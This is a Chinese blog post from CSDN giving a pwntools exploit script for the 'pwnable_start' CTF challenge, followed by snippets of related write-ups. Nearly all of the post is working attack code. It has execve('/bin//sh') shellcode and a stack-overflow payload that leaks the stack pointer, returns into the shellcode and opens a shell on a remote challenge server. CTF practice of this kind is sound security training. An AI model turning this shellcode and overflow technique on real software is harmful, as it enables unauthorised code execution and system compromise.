pwnable_start

最新推荐文章于 2023-07-11 17:20:38 发布
最新推荐文章于 2023-07-11 17:20:38 发布
阅读量80 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43439169/article/details/126990322
版权 
from pwn import *
loacl_elf = ELF("./start")
context.arch = loacl_elf.arch
p = remote("node4.buuoj.cn",29370)

shellcode = asm("xor ecx,ecx;\
                 xor edx,edx;\
				 push edx;\
				 push 0x68732f6e;\
				 push 0x69622f2f;\
				 mov ebx,esp;\
				 mov al,0xb;\
				 int 0x80") 
payload = 'a'*20  + p32(0x08048087)
 
p.recvuntil("Let's start the CTF:")
p.send(payload)
esp_addr = u32(p.recv(4))
p.recv()
payload= 'a' * 20 + p32(esp_addr + 20) + shellcode
p.send(payload)
 
 
p.interactive()

 

风轻夜落
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP中ob_start函数的使用说明
10-26
本文是对PHP中ob_start函数的使用方法进行了详细的分析介绍,需要的朋友可以过来参考下,希望对大家有所帮助
fft.zip_Start Here
09-24
FFT C code I found from internet. I just use this code for registe so that I could start my download here
【PWN刷题】Pwnable-Start、Pwnable-orw
QYbudong的博客
05-03 885
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
pwnable start
m0_57754423的博客
01-25 1702
如果有什么不懂的地方,可以在评论区评论哦,看到就会回答的。 拿到附件以后 checksec一下: 32位程序 没有开启任何保护,放入ida中看一下,只有两个函数_start和_exit,这个题目的源码就不是C代码,本身就是汇编代码,: 我们看汇编代码: 大概流程就是 先压栈esp和exit函数地址,然后压栈字符串,我们可以先运行一下这个程序: 中间的五次push应该就是压入的这些字符串。 随后 write系统调用 打印这些字符串,然后 read系统调用 让用户写入数据 write了
buu pwnable_start 详解
m0_74172100的博客
07-11 138
这里是不是使得 ret (返回地址)成为了新栈的内容,因此利用题目自带的write函数 将ret(返回地址)填入 p32(0x0804808),然后执行 mov ecx,esp。#使esp(栈顶)增加了0x14字节,ebp没改变,使用的内平栈,没有ebp,覆盖完buf后就是ret,从ret开始就是一个新的栈。之前加上一个push ecx 还是因为 add esp,14h ,使得 ret (返回地址)成为了新栈的内容,所以使用 push ecx ,使 esp-4 跳过 ret的地址。
pwnable_start(write up)
m0_73756460的博客
01-19 178
buu刷题 pwnable_start(write up)
php session_start()出错原因分析及解决方法
10-26
本文是对php中session_start()的出错原因及解决方法进行了详细的介绍,需要的朋友可以过来参考下,希望对大家有所帮助
SPI_start.rar_SPI_Start
09-23
基于单片机的SPI实验学习,测试通过,希望能帮助到你的学习。
ui_start.rar_ui_start
09-23
ofdm系统全局函数,包括可视化窗口的定义
vma.rar_Start Up
09-23
Round up the start address. It can start out unaligned as a result of stack start randomization.
[BUUCTF]PWN——pwnable_start
mcmuyanga的博客
12-05 1100
pwnable_start 附件 步骤: 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法 本地试运行一下,看看程序大概的情况 32位ida载入,没法f5,好在汇编不长,看得懂 一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了 write(1,buf,0x14) read
[BUUCTF]刷题:pwnable_start
zyxx_wjc的博客
07-06 208
BUUCTF:pwnable_start题解
关于BUUCTF之“pwnable_start”的一点小结
Probeginner的博客
12-07 279
之前这个用汇编代码编写shellcode的题目做的较少,这题算是开端。 正常检查程序保护,啥也没开。 我们先分析一波程序: 需要用到一点汇编知识,总的意思是:四个xor清零四个寄存器。而后压栈数据,是最开始会输出的“Let’s start the CTF:”然后调用write函数输出上面内容0x14个字节。而后调用read函数输入最大0x3c字节内容。在add esp ;然后返回。 我们选择shellcode在栈上执行办法。所以我们需要泄露栈地址,计算偏移量,覆盖返回地址为shellcode所在地址 .
PWN-PRACTICE-BUUCTF-15
P1umH0的博客
08-09 128
PWN-PRACTICE-BUUCTF-15axb_2019_fmt32wustctf2020_getshell_2others_babystackpwnable_start axb_2019_fmt32 格式化字符串漏洞 第一次打印出printf的真实地址,进而计算libc基地址,得到system真实地址 第二次修改got表,使printf的got指向system的真实地址,后面执行printf时实际上是执行system from pwn import * #p=process('./axb_2019_f
pwnable.tw 第一题之start
像初雪一样自由洒落
04-26 524
今天学长布置了作业,,,做这道题,,, 言承这次遇到的第一个情况,,,就是页面打开了,题目出不来。作为一名安全一份子,一直不会访问外网,流泪。 趁着这次机会,搞定了,参考博客:https://www.wonxun.net/share/444 然后我们来看题 32位的程序,程序什么也没开,,,感觉挺友善的哈 执行效果,,挺好就一个输入点,基本猜测就是栈溢出,,, 用id...
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4148
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
pwnable.tw - start
不急不躁
07-08 4122
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
__va_start
最新发布
08-28
__va_start是一个宏,用于在C语言中初始化一个指向变长参数的指针。它是通过调用va_start函数来实现的。va_start函数的原型是void va_start(va_list ap, last),其中ap为va_list类型的变量,指向参数的指针,last为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值